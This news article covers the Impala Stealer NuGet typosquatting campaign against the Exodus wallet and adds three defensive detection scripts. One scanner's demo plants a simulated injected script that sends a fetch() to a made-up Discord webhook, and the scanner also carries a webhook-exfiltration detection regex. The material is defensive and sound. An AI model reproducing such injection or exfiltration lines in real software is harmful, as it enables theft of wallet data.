    Impala Stealer: another cryptocurrency thief has reached developers, this time through the NuGet platform

    How secure are public software repositories in general?

    Cybersecurity researchers recently discovered cryptocurrency-stealing malware that was distributed through the NuGet package platform in the form of 13 fake packages.

    The typosquatting campaign, described in detail by JFrog researchers, relied on passing the malicious packages off as popular legitimate packages that developers use every day. The attackers copied the names of those packages with small changes; since even legitimate package IDs are often long and compound, a developer can easily pick the wrong one and pull the malware onto their machine.
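
    The mismatch the paragraph describes (a package ID one edit away from a popular one) is mechanical enough to check for in a build pipeline. The script below is an added example written for this article, not JFrog's tooling: it pulls every PackageReference out of a .csproj, compares each ID against a short allowlist of well-known package IDs using optimal-string-alignment (Damerau-Levenshtein) distance, and flags anything that is close to, but not exactly, a popular ID. The allowlist and the .csproj are constructed for the demo; the look-alike names in it are invented and are not the packages from the campaign.

```python
"""Flag NuGet PackageReference IDs that look like typosquats of well-known packages.

Added example for this article (not JFrog's code). POPULAR and SAMPLE_CSPROJ are
constructed for the demo; in practice feed in the top-N IDs of the feed you trust.
"""
import xml.etree.ElementTree as ET

POPULAR = [
    "Newtonsoft.Json",
    "Serilog",
    "Microsoft.Extensions.Logging",
    "System.Text.Json",
    "Dapper",
    "AutoMapper",
]

# Constructed project file: two real IDs, three invented look-alikes.
SAMPLE_CSPROJ = """<Project Sdk="Microsoft.NET.Sdk">
  <ItemGroup>
    <PackageReference Include="Newtonsoft.Json" Version="13.0.3" />
    <PackageReference Include="Serliog" Version="3.1.1" />
    <PackageReference Include="Microsoft.Extension.Logging" Version="8.0.0" />
    <PackageReference Include="Dapper" Version="2.1.35" />
    <PackageReference Include="newtonsoft-json" Version="13.0.3" />
  </ItemGroup>
</Project>
"""


def damerau_levenshtein(a: str, b: str) -> int:
    """Optimal string alignment distance: insertion, deletion, substitution and
    adjacent transposition each cost 1, so 'Serliog' is 1 away from 'Serilog'."""
    la, lb = len(a), len(b)
    d = [[0] * (lb + 1) for _ in range(la + 1)]
    for i in range(la + 1):
        d[i][0] = i
    for j in range(lb + 1):
        d[0][j] = j
    for i in range(1, la + 1):
        for j in range(1, lb + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)  # transposition
    return d[la][lb]


def normalize(pkg_id: str) -> str:
    """NuGet IDs are matched case-insensitively, so compare in lower case.
    Separators are kept: 'Newtonsoft-Json' is a different ID from 'Newtonsoft.Json'."""
    return pkg_id.lower()


def package_references(csproj_xml: str) -> list[str]:
    """All PackageReference Include= IDs in a project file, in file order."""
    root = ET.fromstring(csproj_xml)
    return [el.attrib["Include"] for el in root.iter("PackageReference") if "Include" in el.attrib]


def typosquat_candidates(csproj_xml: str, popular=POPULAR, max_distance: int = 2):
    """Return (referenced_id, look-alike_popular_id, distance) for each reference
    that is within max_distance edits of a popular ID without being that ID."""
    popular_norm = {normalize(p): p for p in popular}
    hits = []
    for ref in package_references(csproj_xml):
        n = normalize(ref)
        if n in popular_norm:
            continue  # the genuine package (modulo case)
        best = min(popular_norm, key=lambda p: damerau_levenshtein(n, p))
        dist = damerau_levenshtein(n, best)
        if dist <= max_distance:
            hits.append((ref, popular_norm[best], dist))
    return hits


if __name__ == "__main__":
    for ref, lookalike, dist in typosquat_candidates(SAMPLE_CSPROJ):
        print(f"suspicious: {ref!r} is {dist} edit(s) from {lookalike!r}")
```

    Two caveats for real use: a distance threshold of 2 is noisy against a large allowlist (many genuine IDs are close to each other), so run the check as a warning that requires an explicit allow rather than as a hard failure, and the check says nothing about the package contents; it only catches the name trick. Prefix-style squats such as a fake "Popular.Package.Core" are not caught by edit distance and need a separate rule.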

    The two-stage attack culminated in the deployment of a persistent .NET-based backdoor, "Impala Stealer", capable of gaining unauthorized access to victims' cryptocurrency wallet accounts.

    "The payload used a very rare obfuscation technique called .NET AoT Compilation, which is much more stealthy than using off-the-shelf obfuscators, but also makes it difficult to reverse engineer the binary," JFrog said in a statement.

    .NET Native AOT compilation is an optimization technique that pre-compiles an application to native machine code ahead of time. Native AOT applications start faster, use less memory, and run on a machine without the .NET runtime installed. For an analyst the side effect matters more than the optimization: the shipped binary contains no IL, so the usual .NET decompilers (ILSpy, dnSpy) have nothing to work with and the file has to be analyzed like any other native executable.
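
    The first triage question for a suspicious ".NET" sample is therefore whether it is still a managed assembly at all. A managed PE carries a CLR runtime header (data directory 14 of the optional header); a Native AOT build, like any other native image, does not. The script below is an added example written for this article, not JFrog's tooling: it parses just enough of the PE headers to read that directory entry. The two images it is tested on are constructed minimal PE32+ headers, not real binaries.

```python
"""Tell a managed (IL) .NET assembly from a native image such as a Native AOT build.

Added example for this article (not JFrog's code). fake_pe32plus() builds
constructed, non-loadable header blobs purely so the check can be exercised offline.
"""
import struct

CLR_DIRECTORY_INDEX = 14  # IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR


def has_clr_header(pe: bytes) -> bool:
    """True if the PE has a non-empty CLR header, i.e. it carries IL and metadata
    that ILSpy/dnSpy can decompile. False for native code (C/C++, Native AOT)."""
    if pe[:2] != b"MZ":
        raise ValueError("not a PE image (missing MZ)")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("not a PE image (missing PE signature)")
    opt = e_lfanew + 4 + 20  # skip PE signature and the 20-byte COFF file header
    magic = struct.unpack_from("<H", pe, opt)[0]
    if magic == 0x10B:      # PE32
        num_dirs_off, dirs_off = opt + 92, opt + 96
    elif magic == 0x20B:    # PE32+
        num_dirs_off, dirs_off = opt + 108, opt + 112
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    num_dirs = struct.unpack_from("<I", pe, num_dirs_off)[0]
    if num_dirs <= CLR_DIRECTORY_INDEX:
        return False        # header too short to even contain a CLR entry
    rva, size = struct.unpack_from("<II", pe, dirs_off + 8 * CLR_DIRECTORY_INDEX)
    return rva != 0 and size != 0


def fake_pe32plus(managed: bool) -> bytes:
    """Minimal x64 PE32+ header (constructed for the demo; not a loadable image)."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)  # 64 bytes
    # COFF: Machine=x64, 1 section, timestamp, symtab ptr, nsyms, SizeOfOptionalHeader=240, flags
    coff = struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, 240, 0x22)
    # Optional header: magic, zeros up to NumberOfRvaAndSizes (offset 108), then 16 directories
    opt = struct.pack("<H", 0x20B) + b"\0" * (108 - 2) + struct.pack("<I", 16)
    dirs = [(0, 0)] * 16
    if managed:
        dirs[CLR_DIRECTORY_INDEX] = (0x2008, 0x48)  # RVA/size of an IMAGE_COR20_HEADER
    opt += b"".join(struct.pack("<II", rva, size) for rva, size in dirs)
    return dos + b"PE\0\0" + coff + opt


def triage(pe: bytes) -> str:
    """One-line verdict for a sample: which tool to open it with."""
    return "managed assembly: decompile the IL" if has_clr_header(pe) else "native image: disassemble"


if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        with open(path, "rb") as f:
            print(path, "->", triage(f.read()))
```

    The verdict is asymmetric: a present CLR header proves there is IL to decompile, but a missing one only says the container is native. A .NET single-file publish without AOT also produces a native apphost with the managed assemblies appended as a bundle, so "native image" is a prompt to look further (bundle markers, embedded assemblies, runtime strings), not proof that the IL is gone.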

    The second-stage payload comes with an auto-update mechanism that fetches new versions of the executable from a remote location. The same mechanism gives the malware persistence on the victim's system by injecting JavaScript code into the Discord desktop application or Microsoft Visual Studio Code, so that launching either application starts the stealer binary.

    The binary then looks for the installed Exodus Wallet desktop app and injects JavaScript code into several of its HTML files to collect sensitive data and exfiltrate it to a hard-coded Discord webhook.
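
    Both the persistence step and the wallet step described above leave the same two traces on disk: application JavaScript or HTML files whose content no longer matches a clean install, and a hard-coded Discord webhook URL inside them. The script below is an added example written for this article, not JFrog's tooling: it hashes the scriptable files under an application directory into a baseline, then rescans and reports files that changed or appeared, plus any Discord webhook URL found in them. The install directories of Discord, VS Code and Exodus are not assumed; the script takes whatever directory you point it at, and the demo builds a tiny constructed "wallet" tree and tampers with it.

```python
"""Detect injected JavaScript/HTML and hard-coded Discord webhooks in an app directory.

Added example for this article (not JFrog's code). The directory layout, the
'injected' script tag and the webhook URL in demo() are all constructed.
"""
import hashlib
import re
import tempfile
from pathlib import Path

# Discord webhook URLs have a fixed shape: /api/webhooks/<numeric id>/<token>.
WEBHOOK_RE = re.compile(
    r"https://(?:ptb\.|canary\.)?discord(?:app)?\.com/api/webhooks/\d+/[A-Za-z0-9_\-]+"
)
SCAN_SUFFIXES = {".js", ".html", ".htm"}


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def scriptable_files(root: Path):
    for p in sorted(root.rglob("*")):
        if p.is_file() and p.suffix in SCAN_SUFFIXES:
            yield p


def baseline_for(root: Path) -> dict[str, str]:
    """Snapshot of a clean install: relative path -> SHA-256. Take it before the
    machine can be tampered with (or from a freshly downloaded installer)."""
    return {p.relative_to(root).as_posix(): sha256_file(p) for p in scriptable_files(root)}


def scan_tree(root: Path, baseline: dict[str, str]) -> list[dict]:
    """Findings: files modified since the baseline, files the baseline never saw,
    and every Discord webhook URL embedded in a scriptable file."""
    findings = []
    for p in scriptable_files(root):
        rel = p.relative_to(root).as_posix()
        if rel not in baseline:
            findings.append({"file": rel, "kind": "unknown_file"})
        elif baseline[rel] != sha256_file(p):
            findings.append({"file": rel, "kind": "modified"})
        text = p.read_text(encoding="utf-8", errors="replace")
        for m in WEBHOOK_RE.finditer(text):
            findings.append({"file": rel, "kind": "discord_webhook", "url": m.group(0)})
    return findings


def demo() -> list[dict]:
    """Build a constructed 'wallet' install, baseline it, tamper with it, rescan."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        app = root / "resources" / "app"
        app.mkdir(parents=True)
        index = app / "index.html"
        index.write_text("<html><body><script src='app.js'></script></body></html>")
        (app / "app.js").write_text("console.log('wallet');")
        baseline = baseline_for(root)
        # Simulated injection: appended script that posts data to a hard-coded webhook
        # (the id/token below are made up).
        index.write_text(
            index.read_text()
            + "<script>fetch('https://discord.com/api/webhooks/123456789012345678/AbCdEf_ghij-KLMN')</script>"
        )
        (app / "loader.js").write_text("require('child_process')")  # new dropped file
        return scan_tree(root, baseline)


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

    Hash drift alone is noisy right after a legitimate application update, so re-baseline on every version change you trust and treat a change with no matching update as the signal. The webhook match is the higher-fidelity indicator: a wallet or editor has no business embedding one.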

    “The attackers used typosquatting techniques to deploy a custom malicious payload that targeted the Exodus crypto wallet,” said Shachar Menashe, senior director at JFrog Security Research.

    Uploading malicious packages to the platforms developers rely on has already become commonplace. For example, shortly before the JFrog report, Phylum researchers discovered a malicious package named mathjs-min in the npm registry. The package contained a credential stealer that grabbed passwords from the official Discord app and from web browsers such as Google Chrome, Brave, and Opera.

    “Our investigation proves that no open source software repository is completely trustworthy, so security measures must be taken at every stage of the software development life cycle to ensure the security of the software supply chain,” JFrog concluded.
    Author: DeepWeb